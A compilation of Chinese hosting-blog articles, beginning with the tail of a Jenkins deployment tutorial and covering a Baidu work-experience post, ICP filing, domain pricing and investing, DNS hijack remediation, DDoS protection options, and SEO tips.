配置远程代码仓库地址,Jenkins 会从该地址拉取代码。注意此处如果提示无法读取仓库,有可能是: 公钥没有添加到远程代码服务器的 authorized_keys 文件里,上面配置 SSH 免登录是 Jenkins 访问应用服务器的,Jenkins 访问代码服务器也同样需要配置,除非应用服务器和代码服务器是同一台机器。如果使用码云或 GitHub 等代码托管平台,会有相应的 SSH key 设置页。 公钥已添加到相应文件里,但没有手动连接第一次。解决方法很简单,以 jenkins 用户身份手动 clone 一次仓库,确认 yes 即可。 勾选 Add timestamps to the Console Output,在控制台输出构建过程。 填写 Maven 打包指令,-DMaven.test.skip=true 表示跳过测试。 勾选 Run only if build succeeds,选择 Send files or execute commands over SSH。 接下来就是设置 build 完之后,把 jar 包从 Jenkins 服务器拷贝到应用服务器上,并运行。 Name:选择之前创建的服务。 Source files:maven 打包后生成的 jar 包,即要拷贝到应用服务器运行的程序,可填多个,英文逗号分隔。 Remove prefix:忽略前缀,我们只需要拷贝 target 下的 jar 包,不需要在应用服务器上生成 target 目录。 Remote directory:目标文件夹,会继承全局设置,例如此处会把 jar 包拷贝到 /usr/local/app/demo 目录下。 Exec command:拷贝完成后,在应用服务器上执行的命令或脚本。 save -> build now,构建成功后,打开浏览器访问你的站点吧~ 4. 总结 其实整个流程不是很复杂,Jenkins 从远程代码库拉取代码 -> 调用 maven 指令将项目打包 -> Jenkins 将打包好的文件拷贝到远程应用服务器 -> 在远程应用服务器上执行 shell 指令,启动程序。其中 Jenkins 两次远程操作都是通过 SSH 完成的。 通过 yum 安装 Jenkins 和 Java 比较方便,但是在配置的时候相对麻烦,安装路径要自己找,配置 SSH 的时候也是要用 jenkins 用户身份,而不是 root,如果采用解压缩包的方式就比较自由一些。 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### 在「百度」工作或实习是一种怎样的体验? 工作经历:17-18年百度工作1年 工作地点:百度大厦(海淀区上地十街),百度另有一新建的园区-百度科技园,下文会做比较 职位:大数据工程师 工作体会: 关于工作强度-首先,由于我的工作是与用户数据有关,具有较高的敏感度,领导一再要求保密。因此这里就不谈工作内容了,只谈一下工作强度。百度跟其他互联网公司差不多,弹性工作制。但是百度的弹性是真·弹性,我们请假群里说一下就好,时间也是自己安排。一般而言百度上班的大部队是10:30左右到,也就是这个点是来人最多的时候,来了之后工作一会儿大概12:00就吃饭去了。吃完饭之后我们一般习惯绕着百度大厦遛弯,这个时候通有一群人在一起遛弯。大概13:30左右回到工位,下午工作完成后18:00吃晚饭,晚饭之后继续遛弯,遛完之后继续工作,一般工作到20:00就陆续开始有人离开,一般到22:00人就走的差不多了,少部分在继续加班加点。 周末加班的情况比较少,我周六来过,基本上就稀稀拉拉几个人在工位上。所以整体来看,百度的工作强度还可以,当然我只是说我部门和百度大厦的情况。 关于工作环境-首先说工位,因为没有在北京其他的互联网公司工作过,所以不太好比较。但是据以为工作快十年的老员工说,百度的工位是北京各大公司里面排在前列的,大而且舒适。我个人的体会是,工作的桌面非常大,以至于对我们程序员来说有点奢侈。我进去的时候公司统一发的笔记本,每个人随机安排,有macbook和windows本,都是轻薄本,方便你带着去开会。 本人运气比较差,没拿到macbook, 分了一台惠普的轻薄本,平时用是没问题的。 关于吃-初到百度大厦的时候,觉得样样东西都好吃,而且每周一早上的饭是免费的,刚去的时候感觉幸福感满满,但是三个月后就开始腻了。因为百度大厦的食堂有五个打饭通道,每个通道的种类不一样,但是做的菜基本是固定的,大概好几个月才换菜品,天天吃很快会腻。吃一次的价格不等,10-30元,总体看你点的菜式。食堂对面还有一个西餐馆,主要做一些意面、沙拉之类的。 相比之下科技园的同学就幸福很多了,食堂有几十个通道,而且各种菜式都有,相比之下我们只有羡慕的份。 关于公司文化-百度的内部文化表面上看还是不错的,百度内部互称同学,见到新同事叫同学就好,和Boss之间上下级的差别也不明显,一般都叫外号或者名字。我的大Boss是个T10,稍微了解百度的人都知道这是一个多高的级别,就坐在我们的隔壁,平时主要在忙开会的事。呆久了就发现百度深层次的文化是很保守的,陆奇当时才来没多久,天天在邮件系统里和开会时喊改革改革(没有这么直白,但是有这个意思),而且百度内部也确实有一些改变,但是总感觉他有一些有心无力,果然在我离开没多久之后陆奇就辞职了。 百度内部的员工对于外界吐槽百度其实也是知道的,并且有时候也会跟着一起吐槽,但是总体来说并不会太关注这些问题,并且对公司总体也是满意的。因为总能听到猎头找他们的电话,几个老员工以暂时没兴趣都拒绝了,这几个属于娃都有了,房子也买了,安安稳稳过日子就行了。 特别的是组里有一个本硕双清的人,能力各方面都没得说,毕业之后在公司工作了两年多由T4升到T6,结果早早在西南某互联网重镇买了房,后来去了那里的另外一加巨头的分公司,大概觉得北京的房价太贵了,留下来困难吧。 我在百度的时候百度巅峰时900亿美金的市值,现在已经跌到不如美团。我经常跟我朋友打趣说我一离开百度百度就跌了。虽然百度已经成为互联网人人讨伐的对象,不过对于一个从事技术的开发人员来讲,抛开别人对于百度的印象,百度仍然是一个不错的选择,首先有不错的技术。其次有牛逼的同事,我同事一堆清北,你不是985都不好意思和别人打招呼。然后工作环境和压力尚可。对技术人员来讲,百度的经历绝对会是一段有用且有意义的经历。 作者:Dr.Neo 链接:https://www.zhihu.com/question/341515180/answer/805641909 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 #### 在国内做盗版日本动漫网站要被抓 现在国内版权管越来越严重了,3月28日消息,据日媒报道,因为来自日本的版权团体起诉,中国江苏警方取缔了一家号称目前最大级别的日本向动画盗版站,目前这也是首例此类型案件被揭发。 ·根据日本创作物海外流通促进机关(CODA)显示,该盗版站原名《B9GOOD》,自2008年起换名运营至今,仅仅21年3月~今年2月的两年时间访问数就超过3亿次,被CODA判为目前最大级别的日本向动画盗版站。 据悉,警方已经于2月14日逮捕了主要嫌犯,33岁重庆在住男子,据推算男子已经非法获益1.2~1.4亿日元。另有3名从犯追缉中。·《B9GOOD》已经于3月27日被封禁,该站日本用户占95%比例。 所以,那些想靠盗版影音在国内赚钱的站长,还是放弃吧,免费饭不好吃哦。 #### 在百度搜索眼里什么样的内容才算优质? 11月13日 消息:今天下午4点,百度搜索线上公开课正式开课。在公开课中,百度方面对搜索优质内容进行了详细解读。 总结起来其实主要就这两点:“内容垂直专业”“内容布局合理美观”。 本次公开课的要点,具体如下: 一、出身专业—发布来源可信赖 百度方面表示,百度搜索的重要职责是为用户提供最具有价值的信息,而内容质量是价值的最核心体现。搜索希望网站为用户提供的内容足够专业,从而提高用户对内容平台信任程度。 1、聚焦擅长的领域 百度希望创作者们发布的内容更加垂直专业,内容跨度不要太大,专注聚焦同类型内容。 2、身份背景真实,权威,让用户可感知到 百度方面内容创作者们能够证实发布内容真实可信,比如医生可以提供职业证明,母婴类内容创作者能够证实内容的权威可靠等。 3、行业内知名,有声望 二.文采出众—核心信息有内涵,信息传达感受好 1、表述清晰阅读顺畅,文笔用词用句舒适。行文有逻辑,文笔有美感。 2、专业严谨深度全面,能理解透彻,实操性强 比如能够用更多的专业术语,并且从多角度阐述观点,清晰有条理,实用为主。 3、制作精美,视觉效果佳,浏览体验愉悦连贯 考虑到用户的视觉感受,文章的段落,搭配的图片,视频,排版都需要美观,布局清晰合理,让用户阅读上能够有愉悦的体验。 而题文不符,文章排版混乱、图片不清晰等则是典型的低质内容,搜索引擎是可以识别的。 三,体验舒适—排版/交互/功能使用流畅 1、排版布局合理,考虑用户体验 2、减少不必要的阅读权限设置 3、一篇内容能当页阅读的,需减少不必要下一页跳转 4、主体内容不要遮挡,PC/移动端 做好适配 四.周边可考—可参考的辅助信息丰富 除了文章表述清晰有条理,布局美观外,增加用户评论等辅助信息也是良好的体验之一。 下载页面的版本信息,小说章节数,更新频次;用户的点赞、反馈、用户的评论、发布时间、发布作者等对用户来说都是良好的可参考的辅助信息。 #### 在线申请Let‘s Encrypt免费泛域名SSL证书 今天有位客户想申请免费Let‘s Encrypt泛域名证书,但是一直没成功,咨询主机吧有没有什么好的地址申请,这里主机吧给大家推荐一个不错的申请地址:http://amh.sh/ssl.htm 这是一个由国内开源云主机面板弄的一个在线免费申请Let‘s Encrypt证书的网址。 操作非常简单,需要先注册帐号,然后输入域名,申请泛域名证书要输入*,如*.zhujib.com,泛域名证书申请验证方式一定要用DNS验证,否则无法成功申请。 按照提示解析相关记录,然后完成验证。 通过后,就立即证书KEY、CRT,非常快。然后我们直接部署到服务器上即可。 #### 在网站后台添加统计js代码,百度云加速拦截怎么解决? 最近,有客户反馈网站在后台添加百度统计代码的时候,显示被百度云加速拦截,要如何解决? 主机吧这里来说明下,之所以被拦截,是因为百度云加速有应用防火墙,检测到网站有注入代码的情况,就会进行拦截,这种防御规则是为了防止网站被人挂马。 解决办法也很简单,只需要进入百度云加速后台,把自己的IP加入白名单即可。 进入安全功能-IP防火墙-IP白名单 #### 在腾讯云新增域名备案的体验 主机吧打算今年再做一个网站,由于之前网站备案在腾讯云备案,所以得在腾讯云备案,今天就来给大家说下主机吧这边在腾讯云备案的体验。 登陆腾讯云后,新增备案服务需要你在腾讯云的业务有备案授权码,主机吧之前买过一个新的轻云服务器没有做过备案,可以生成两个备案码,所以备案不是问题。 生成备案码后,进入我的备案,新增服务,由于之前备案过,腾讯云保留了之前备案资料,像企业营业执照、法人身份证、网站负责人身份证等都有预留,所以不需要重新上传,非常方便。 需要重新弄的是上传域名实名截图,同时需要微信小程序视频验证,这些都很快。 一切搞定后,提交腾讯云初审,第二天一大早腾讯云备案专员就打电话过来确认了,不过由于之前备案的域名有一些问题,如ICP备案号没有链接工信部官网,导致需要重新修改,其它的没什么问题。 修改后,重新提交,腾讯云那边直接提交管局了。 整个备案下来,感觉非常轻松,没有想象中的严,对于之前域名的内容,腾讯云也没有过多要求,只是要求链接工信部网站而以。 同时并没有像网上传的需要交税证明、网站建设规划书之类的东西,也可能是主机吧备案的网站不够,也可能是每个省份的要求不一样,总得来说,这次备案体验非常好。 如果不是国内备案要求严格,卡死了很多网站,我相信国内网站建设行业是非常繁荣的,毕竟需求太大了。 #### 地摊经济火了,百度“摆摊技巧”搜索量暴涨655%创10年新高 6 月 3 日消息, 为应对新冠疫情冲击下的就业危机,我国多个城市放宽了对“地摊经济”的管制。李克强总理提出:“地摊经济、小店经济是就业岗位的重要来源,是人间的烟火,和‘高大上’一样,是中国的生机”。百度搜索大数据显示,近 7 天“摆摊技巧”相关内容搜索热度同比暴涨665%,达到 10 年来最高值。在总理的号召之下,“地摊经济“正呈现火热的发展态势。 值得注意的是,在“摆摊技巧“相关热门搜索内容中,热度最高的为“年轻人适合摆什么地摊”,此外,排名前列的还有“摆地摊真的比打工强吗”等相关内容,体现出年轻一代对这种“新经济“积极的讨论与参与意愿。此外,“地摊上最吸引女人的是啥东西”、“首富从地摊开始”、“高手教你摆地摊诀窍”等也成为相关热搜内容。 相对于其他成本高、前期投入大的行业,低成本、低风险的“摆地摊”提供了一条创业新思路。百度搜索大数据显示,近 30 天,“摆摊技巧”对 90 后这批“中浪”的吸引力最大,超过53%的关注者均为 90 后。与行动力最强、关注摆地摊具体技巧的 90 后相比, 80 后更加“理论派”,对“地摊经济”表现出了所有年龄层中最高的搜索兴趣。 地摊经济不仅增添了城市的烟火气,更解决了大量就业问题。自出台政策允许商贩临时占道经营以来,成都增加就业岗位超 10 万个,这与今年政府提倡的“保就业”基调契合。百度搜索大数据显示,全国各城市积极拥抱“地摊经济”,其中新一线城市表现尤为突出,在搜索相关内容的热门城市排行榜中,新一线城市成都居于榜首,前十中有 7 个城市为新一线城市,但一线城市上海暂未入榜。 地摊经济究竟有多火?义乌的小商品城、嘉兴的海宁皮城,这些小商品公司因“地摊经济”出现股价暴涨的情况。百度搜索大数据也显示,近 30 天,儿童玩具、小吃、充电宝、贴膜等成为地摊商品热门搜索词。此外,“ 10 元 3 样地摊货批发”、“汽车后备箱摆地摊”、“摆地摊要怎么找货源”等地摊经营模式,也成为从业者热搜的内容之一。“后备箱经济”和“地摊经济”一起,让城市的烟火气加速升腾。 #### 域名.chn正式开放注册了 不过看着有点魔幻 不知道大家是否还记得5月份的时候,有过报道我国自主研发的具有国内知识产权的.chn域名要出来了,直到最近才有消息说真的上线了。 介绍说chn和 .cn .com .net 等域名相比不仅速度更快、效率更高、安全性更强。而且“.chn域名”还能能兼容运行美国英特网,可以实现长期支持“双网并行”并且具备互联网母根和主根、十进制网络寻址、本地化域名解析、万物互联“活”编码、网址自身可加密、先认证后通信等核心技术。可以大幅提高网速、降低网费、增加网民,根本扼制骚扰电话、电信诈骗及电商假货,推动消费升级和供给侧革命…… 有没有吹的这么牛B我们先不说,我先来看看在哪里可以注册.chn? 主机吧查了下国内几大域名注册商均没有这种后缀域名注册! 阿里云没有 西部数码没有 主机吧先后查了百度云、腾讯云、新网均没有这种后缀注册。 那么在那里可以注册呢?主机吧搜了半天,终于找到了一家名家域六名的网站上可以注册 但是这网站一看真的辣眼睛,看着像是某个小公司做出来的网站! 再看下底部信息 妥妥的小公司无疑,增值电信业务经营许可证号没有!QQ客服不是企业QQ! 整个公司就靠一个客服?!联系电话居然是手机号码? 连个400电话都没?企业邮箱也用一个QQ邮箱! 看到这里我已经对这个所谓国家级.chn域名有点怀疑了,这样一个国家级后缀怎么会落到一家小公司上呢? 带着这个疑问主机吧搜了下相关信息,发现一个很魔幻的事情,发布.chn域名的信息基本都是一些自媒体,官方信息无从参考! 而且主机吧在百度上同样找到一篇质疑.chn域名的文章<突然爆红的 .chn 出处是哪儿>内容非常详细,看了这个文章主机吧深深的怀疑这个.chn域名真的是国家项目吗?还是只是域名商打着国家名义来骗大家的钱,什么IPV9听都没听过,现在国家大力推广IPV6,而且还没普及,哪来的IPV9。 我们先不管他是不是真的,这个域名可以注册倒是真的,但这个域名有商业价值吗? chn域名给主机吧的感觉就是丑,把这样一个后缀放到浏览器上访问,你会觉得不舒服,反正对我这种有强迫症的人来说,这么一个域名后缀看着难受,大家来体验下 高出来的h看着难受,对比COM、CN简直没法比,主机吧甚至觉得价值不如顶级域名.wang。 主机吧的个人观点是,如果chn域名不是“国家域名”的话,其根本没什么商业价值,当然大家如果钱多的,可以投资几个,也不贵,一年80块。         #### 域名DNS安全防御服务可以防御DDOS吗 最近,有站长拿DNSPOD的DNS防御服务、阿里云云解析DNS防御服务的价格来对比百度云加速这些高防CDN价格。 腾讯云和阿里云的DNS防御服务一年几百块,相比高防CDN便宜不少。 但是,这里给同学们纠正下,DNSPOD这类的DNS防御服务并不能防御DDOS攻击。 DNS安全防御主要是针对DNS层面的攻击,如DNS泛洪攻击和DNS放大攻击等,而不是直接针对服务器层面的DDoS攻击。服务器DDoS攻击通常指的是针对服务器资源的分布式拒绝服务攻击,其目的是耗尽服务器的网络带宽或系统资源,使得服务器无法提供正常服务。 防御服务器DDoS攻击,一般有三种服务方案: 高防服务器 高防服务器是指具备高级防御能力的服务器,它们通常在数据中心拥有专门的硬件防火墙和流量清洗设备,用于防御DDoS、CC等网络攻击。高防服务器能够独立防御高达100Gbps以上的攻击流量,保障服务器的稳定运行。 高防CDN 高防CDN(Content Delivery Network)是一种在全球范围内部署的网络安全防御系统,它通过在多个节点缓存网站内容,加速内容传输的同时,利用流量清洗、IP黑白名单和安全协议等技术手段保护网站免受DDoS、CC攻击等网络威胁。高防CDN可以隐藏源IP,分散攻击压力到各个节点,并且通常具有较低的误杀率。 高防IP 高防IP是一种付费增值服务,旨在保护互联网服务器免受大流量DDoS攻击的影响。通过配置高防IP,攻击流量会被引流到高防IP进行清洗过滤,只有正常流量会被转发到源站IP,从而确保源站的稳定访问。 高防服务器与高防CDN的对比 高防服务器通常提供独立的防御能力,适合需要单独防御高流量攻击的场景,而高防CDN则通过分布式的节点提供防御,适合需要内容分发加速和分散攻击压力的场景。高防CDN能够隐藏源站IP并通过节点分散攻击,但其单个节点的防护能力可能低于高防服务器。 高防IP与高防CDN的比较 高防IP提供单IP独享的防护,而高防CDN则是共享IP的一组IP防护。高防IP的防护能力通常高于高防CDN,但可能会有较高的误杀率。高防CDN适用于通过域名访问的网站业务,而高防IP则适用于多种业务,包括APP、网站、游戏等,并支持全端口转发。 在选择高防服务器、高防CDN或高防IP时,应根据业务需求、攻击类型和预算等因素综合考虑。高防服务器适合对高防御能力有特殊需求的用户,高防CDN适合需要内容分发加速和较好用户体验的网站,而高防IP则适用于需要全端口转发和高防护能力的服务。 #### 域名dns被劫持怎么办 域名dns被劫持怎么办?域名DNS被劫持,第一时间联系服务商,查询DNS是否正确,其次检查网站是否被挂马,导致出现劫持问题等。 域名DNS劫持是什么意思? 我们在上网过程中都有遇到过网页莫名跳转这些情况,打开的目标网站不是原来的内容,反而跳转到了未知的页面,即使终端用户输入正确的网址也会被指向跳转至那些恶意网站,或者本来能正常访问的页面,突然就打不开了,这就是DNS劫持,亦可称域名劫持。 域名dns被劫持怎么办? 1、联系服务商,确认DNS解析是否正确。 如果发现有未知DNS解析,则立即删除这些记录,添加正确的域名DNS解析记录。 2、修改域名管理密码、网站后台管理密码。 出现被劫持现象,说明我们的信息已经有部分泄露了,因此要立即修改各类密码信息。密码应尽量复杂化,数字、字母、符号,以及字母大小写等。 3、检查网站是否被挂马、中毒等。 如果自己有技术,要理解检查网站是否挂马了,中毒了,导致代码被篡改。清理掉各种问题页面,并收集起来。 如果不怎么懂技术,则可以找专业的安全公司给你检查,网上这类公司或者个人都提供这类服务。 4、搜索引擎维护 将各类问题页面删除后,会生成404页面,需要将这些数据提交给搜索引擎,例如百度站长工具提交死链。 5、提升网站安全性 如果网站还没有做HTTPS改造部署,强烈建议改造部署HTTPS,能一定程度解决域名被劫持问题,有条件的给网站部署百度云加速CDN,可解决DDoS、CC攻击,并拦截黑客对程序漏洞扫描,彻底解决安全问题。 #### 域名ICP备案为何会被注销? 最近有站长因为域名备案被注销困扰,这里主机吧来说明下,网站备案在什么时候会被注销。 1.工信部注销 因为网站内容违法违规被工信部注销,个人备案运营企业网站被注销,网站没有挂工信部链接被注销。 2.服务器商注销 没有使用原备案服务商的服务器被注销,网站内容违法违规被空间商注销,网站没有挂工信部链接被注销。域名过期被注销,服务器过期被注销。 3.备案单位注销 如果你的域名备案是别人的,那极有可能是原域名备案个人、单位是有权限直接注销的,而且注销速度非常快,一般一天内就可以注销完成。。 #### 域名不备案可以吗? 在中国,根据《中华人民共和国互联网信息服务管理办法》,任何一个网站都需要进行备案。这意味着,如果您在中国注册了一个域名,无论是个人网站还是企业网站,都必须按照相关规定进行备案。 域名是否需要备案取决于它的使用情况。如果域名指向托管于中国内地(大陆)服务器的网站,或者域名用作邮箱使用,通过“域名”访问企业邮箱,这样的场景下是需要完成备案的。相反,如果域名解析指向托管于非中国内地(大陆)服务器的网站,例如中国香港服务器,或者是当前不使用的域名,则不需要备案。 备案是中国互联网管理部门对网站和应用程序进行管理和监管的一种方式,对于使用国内云服务器的网站和应用程序来说,备案是必须的。备案的目的在于加强对互联网信息的监管,防止不良信息的传播,维护国家信息安全和社会稳定。 虽然备案可能会带来一些麻烦,但它也是出于对互联网安全和社会稳定的考虑。对于个人和企业来说,通过备案可以增加网站的信任度和合法性,减少被搜索引擎封禁或被黑客攻击的风险,同时也可以提高网站在搜索引擎中的排名,增加曝光度。 因此,如果你的域名是在中国注册的,并且打算用于建立网站或邮箱等,那么你应该按照规定进行备案。如果不遵守这些规定,可能会导致网站无法正常访问或其他法律风险。 #### 域名价格疯涨,阿里云域名抢注平台价格涨啦 7 月 27 日消息,阿里云今日发布公告称,因服务成本不断增加,经慎重考虑,阿里云域名抢注平台万网预释放类型域名的竞价起拍价格将于 2024 年 8 月 1 日零时起进行调整。 调整后的规则如下: 自 2024 年 8 月 1 日零时开始预订的.com 后缀万网预释放域名,在域名预订结束后,进入域名竞价阶段时,用户的首次竞拍出价金额为 199 元。 自 2024 年 8 月 1 日零时开始预订的除.com 后缀之外的其他后缀万网预释放域名,在域名预订结束后,进入域名竞价阶段时,用户的首次竞拍出价金额为 99 元。 阿里云方面表示,阿里云域名会不定期开展各类优惠活动,后续也将继续根据域名成本的变化,及时合理地调整(下调 / 上涨)域名价格。 而去年的调价公告则提到,自 2023 年 8 月 8 日零时开始预订的万网预释放域名,在域名预订结束后,进入域名竞价阶段时,用户的首次竞拍出价金额为 69 元。 #### 域名又涨价了!阿里云宣布域名价格调整net英文域名续费上调至89元 1月16日消息:据阿里云官网显示,阿里云日前发布域名价格调整通知。 通知称,因注册局成本上调、域名实名制审核等服务成本不断增加,经慎重考虑,现决定于2023年2月1日零时,进行如下域名价格调整。其中,com英文域名转入价格调整为69元,net英文域名续费价格调整为89元。 阿里云计算,是一家提供云端运算服务的科技公司,创立于2009年9月,为阿里巴巴集团全资所有。阿里云计算公司总部位于杭州,在北京和硅谷等地设有研发中心和运营机构,涉及云计算的产品与服务。 根据高德纳咨询公司的报告,至2021年,公用云IaaS厂商全球市场份额阿里云排名第三,占9.55%,仅次于AWS和Azure。 有域名的小伙伴们赶紧提前续费吧,以免造成损失。 #### 域名和网站之间有什么关系? 域名和网站是互联网中两个不同的概念,它们之间有明显的区别: 定义: 域名(Domain Name):一个易于记忆的名称,用于标识互联网上的一个唯一的、可识别的IP地址。它通常由一串有意义的字母、数字和符号组成,并以点分隔的层次结构表示。 网站(Website):一个在万维网(World Wide Web)上运行的信息平台,通常包含一系列相关的网页和其他资源,可以通过网络浏览器访问。 功能: 域名的功能主要是作为一个指向特定服务器或服务的标签,使得用户可以使用易记的名字而不是复杂的IP地址来访问相应的网站。 网站则是一个信息展示和交互的平台,它可以提供文本、图像、视频、音频等多媒体内容,也可以允许用户进行各种操作,如搜索、购物、发表评论等。 组成部分: 一个完整的网站包括源程序(通常是HTML、CSS和JavaScript代码)、空间(存放网站文件的地方)和域名三个部分。 域名本身只是网站的一个组成部分,但它是唯一可以让用户通过网络浏览器找到并访问网站的部分。 绑定关系: 域名与网站之间存在绑定关系。当一个域名被解析到某个IP地址时,实际上就是在将这个域名指向托管网站的服务器。 当用户在浏览器中输入域名时,DNS系统会将域名转换为对应的IP地址,然后将请求发送到该IP地址所在的服务器,服务器再返回网站的内容给用户。 注册与维护: 域名需要通过专门的域名注册商进行购买和注册,并且需要定期续费才能保持有效。 网站的建设和维护涉及到多个方面,包括网站设计、开发、内容创建、更新以及服务器管理等。 所有权与归属: 域名的所有权归注册者所有,可以在市场上买卖或转让。 网站的所有权归属于其创建者或拥有者,他们负责网站的内容和运营。 简而言之,域名就像是你家的门牌号,而网站则是你的房子本身,包含了所有的家具和装饰品。人们通过门牌号找到你的房子,然后参观里面的内容。 #### 域名备案不直接解析到阿里云的服务器解析到百度云加速 备案会掉吗? 最近有个客户咨询主机吧:域名已经在阿里云备案了,但是如果使用百度云加速后,解析至百度云加速,没解析至阿里云备案会不会掉呢?毕竟阿里云到时检测你域名没解析至他们服务器会取消备案的。 这里主机吧来说明下,目前各大网站使用CDN的情况非常普遍,以前阿里云确实有检测域名不解析至阿里云会被取消的情况,现在已经完善了,只要域名源服务器还是阿里云的,请求回源阿里云国内服务器的就不会被注销备案。所以大家放心使用CDN,这并不会影响备案的,而且阿里云如果检测到你域名没有用他们服务器的都是会邮件或者手机短信提醒修改的,所以非常有保证,阿里云不会随便注销你的备案号。 那为什么还是有很多人反馈备案号掉呢?主机吧盘点下以下几个原因: 1.域名备案号是购买的 购买的备案域名不仅资料不是你的,而且和你网站的内容也不相符,被注销的风险大大提升; 2.原备案人注销的 还是之前的问题,很多人买的是备案域名,这些域名的原备案人是可以随时注销备案的; 3.没有使用正确的接入商 所谓的正确接入商就是你当时购买服务器的时候在对方那边备案,他就是你的接入商,很多人在A服务商备案,用B服务商的服务器,这就是接入商不对,正确应该是你在A备案,那就要在A购买服务器使用,否则原接入商有权注销备案,管局也有权因接入商不对取消备案。 4.使用海外空间 这个是最近主机吧遇到的,一个客户在阿里备案了,使用的也是阿里的服务器,但是他的服务器是香港的,这也导致了阿里云检测不到他有使用他们的服务器,阿里云只对国内服务器进行备案检测,如果你的域名没有用他们国内服务器,那也是不行的。 5.内容违规 虽说管局审核备案号一般很少管网站内容,但是如果你内容有明显违法行为,管局还是会注销备案的,很多备案号都是被人举报注销的,所以网站想运行得久,内容正规是必须的。 #### 域名备案账号.密码等全部忘了,怎么注销备案? 域名的备案账号,密码等全部忘了,备案留的手机好也没有使用了,现在要注销备案,怎么操作? 答案: 首先登陆工信部备案网站,https://beian.miit.gov.cn 找到所在省的备案注销申请表,下载,按要求操作即可。 如果没有请致电010-66411166 咨询。 #### 域名如何查询txt、A、DNS、MX、cname解析记录 对于做网站的朋友来说,经常会遇到域名解析了不知道是否生效的情况,以下就给大家介绍一下如何查询域名的MX、A、DNS、txt、cname记录是否生效 电脑中点“开始” “运行” 输入“CMD” 回车,或者 windows键+R, 接着出现一个ms-dos的黑色界面,如下图: 查询域名txt记录,在黑色界面输入nslookup (空格) -qt=txt (空格) 域名,将会出现记录值,如果没有则说明解析没有成功,如下图: 查询域名DNS记录在黑色界面输入nslookup (空格) -qt=ns (空格) 域名,将会出现记录值,如果没有则说明解析没有成功,如下图: 同理,查询域名A记录、txt记录、CNAME记录只需要修改-qt=记录类型 就行 #### 域名已经不重要了吗? 域名的重要性 域名是互联网基础架构的关键部分,为互联网上任何可用的网页服务器提供了方便人类理解的地址。域名不仅是网站的地址,也是互联网上标识网站的唯一名称。 品牌价值 一个好的域名,可以创造品牌价值,对于具有长远眼光的公司,在运营网站前确定一个好域名,对日后市场推广、产品营销、企业品牌的建立至关重要。例如,百度、淘宝、京东等知名企业的域名都是简短、易记且与企业名称或品牌相一致的,这使得客户记忆深刻,一个好域名可以吸引更多的回头率、激发更多潜在的客户。 网络知名度 一个好的域名能增加企业的网络知名度,一个适合您的企业的好域名,为您的企业带来的收益无疑是非常巨大的。例如,如果该企业的商号属于热门商号,他们能用这个域名,那就证明实力不错,因他们有超前意识,可以合作。 保护品牌 为了避免企业相关域名被恶意使用,影响品牌形象,需要购买最能反应网站名称的域名,并确保好的域名不落在竞争对手手中。 提升搜索排名 域名可以影响网站的排名,一个好的域名可以让客户很快的记住并找到你,使推广事半功倍。 用户体验 域名是用户进入网站的第一印象,用户迅速记住域名也就能够给网站带来长期的流量。 综上所述,域名对于企业的重要性不容忽视,它不仅是企业在线存在的标志,更是企业品牌建设和网络营销的重要组成部分。 #### 域名带www对百度SEO好还是不带www好 现在做网站会遇到一个问题:域名前面要不要添加www,如果不用www,到底好不好?今天主机吧就来详细聊一下: 首选域名:对于百度SEO优化,你应该确定一个首选域名,无论是带www的还是不带的。然后,你需要确保所有非首选域名都被301重定向到首选域名。这样可以避免搜索引擎将同一个网站视为多个不同的网站,从而避免了重复内容的收录问题。 搜索引擎的处理:对于搜索引擎来说,带www和不带www的域名被视为两个不同的网站。如果你的内容完全相同,那么这可能会导致搜索引擎收录重复的页面,包括首页和内页都会重复,这对网站的SEO非常不利。 用户习惯:在国内,用户普遍认为带www的域名是网站的主域名,因此,有些站长会选择使用带www的域名。然而,现在的用户已经不再过于关注域名是否带www,只要能满足他们的需求,就是一个好的域名。 收录时间:一般来说,不带www的域名会比带www的域名更早被收录,同时收录的页面也会更多。这是因为不带www的域名包含了所有子域名的收录情况,而带www的域名则仅包含www的收录情况。 所以,无论你是否选择使用www,最重要的是保持一致性和清晰性。一旦你确定了首选域名,就应该使用301重定向来确保所有非首选域名都被重定向到首选域名。这样做不仅有利于SEO优化,也有助于维护网站的结构和用户的体验。 #### 域名惹得祸:知名云计算公司Zoho域名被禁两小时 据外媒报道,著名云计算科技公司、印度软件服务商Zoho的域名(zoho.com)在今天被关闭了长达两个小时。此番意外影响了Zoho旗下的3000多万用户,大家不得不被指向一个完全空白的页面。资料显示,Zoho是一家提供SaaS软件产品(CRM、在线Office、邮箱、项目管理、团队协作等等)的一站式云平台供应商,国内由卓迈运营。《福布斯》去年评选的全球最佳云计算公司100强中,Zoho位列66位。回到此次事件,Zoho表示是自己的主域名注册机构TierraNet“搞的鬼”。而TierraNet在声明中表示,原因是和Zoho数次沟通解决来自Zoho.com的垃圾钓鱼邮件问题都无疾而终,最终“出此下策”(据说是一套自动化报告系统采取的行动)。不过,Zoho的CEO Sridhar Vembu认为TierraNet的单方面行动荒唐可笑,影响了他们价值数百万美金的在线业务。Vembu还补充,最近两个月总共接到了3起钓鱼邮件投诉,其中2起已经处理,另一起正在定位解决。 #### 域名投资的技巧与案例 域名投资是依靠域名注册的网络商业手段,是一种信息化发展趋势下的电子商务终端投资行为。域名投资人则是具备丰富综合知识能力的投资群体。域名投资涉及到全球范围,不同国家,不同市场,不同行业,以及不同的目标群体。这是一个学科式的投资模式,是一种以狙击为目的的商业运作。自此行业中,成功的投资者不仅仅是IT方面的专家,还是商业、行业、新闻等诸多领域的知之者。   一、域名投资简介 1、定义 域名投资是指注册和购买有价值的域名,然后转让获利的行为。投资者一般被成为“米农”。 2、投资价值 应该说我国的域名交易还处于一个成长期阶段,但是媒体不断披露那些靠转让域名一夜暴富的例子,给人们留下了错误的印象。好像投资域名一本万利,坐在家里就能生钱。能够成功将域名卖出去的肯定是少数,卖给大公司收美元的例子更是凤毛麟角。到底如何理性面对域名投资?      投资域名是能赚钱的,但是指望注册一个域名就能获得百倍的回报,这是不现实的。中国的私人域名数量已经超过了100万,在各个域名交易网站注册的兼职、专职炒家也达到了10多万人。市场已经初步形成。对于投资者来说,什么域名值得投资,什么域名容易转手,大家只是根据自己的感觉走,其实经过专家论证,基本形成了一个评估的体系。 一个简单的原则,域名是越短小越好。简单的数字、字母的组合容易被记住,这样的网站登录的人就多。域名的印象即一个域名在人们看了第一眼后能够记住的程度,对于这个域名的价值很重要。这就是为什么那些较早进入域名投资领域的人赚到了第一桶金。他们利用先占原则,抢注了一些短小精悍的域名。       